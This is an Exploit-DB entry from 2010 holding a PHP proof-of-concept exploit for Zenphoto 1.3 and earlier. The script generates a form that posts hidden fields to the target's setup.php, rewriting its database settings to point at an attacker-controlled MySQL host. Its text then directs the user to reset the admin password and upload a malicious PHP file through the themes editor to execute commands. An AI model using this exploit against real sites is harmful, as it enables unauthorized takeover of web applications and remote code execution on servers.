ZenPhoto - Config Update / Command Execution

EDB-ID:

15114

CVE:

N/A


Author:

Abysssec

Type:

webapps


Platform:

PHP

Date:

2010-09-26


<?php
/*

  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/

Abysssec Inc Public Advisory
 
 
  Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
 
*/


$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>

<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
	By : Abysssec @ Inc <br>www.Abysssec.com<hr>
	<form method='POST' action='$path' >
	<input type=hidden name='mysql' value='yes'>
	<input type=hidden name='mysql_user' value='$new_mysql_user'>
	<input type=hidden name='mysql_pass' value='$new_mysql_pass'>
	<input type=hidden name='mysql_host' value='$new_mysql_host'>
	<input type=hidden name='mysql_database' value='$new_mysql_database'>
	<input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
	After click on below , if target will can connect to your Mysql_Host :<br>
	You Must view 'GO !' Messege ...<br>
	Click on & wait ....
	<br> Then , You need to set your admin user and password.<br><hr>
	Upload file:<br>
	you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
	<input type=submit value='Send Your Setting '>
	</form>
	";
echo "</body></html>";
?>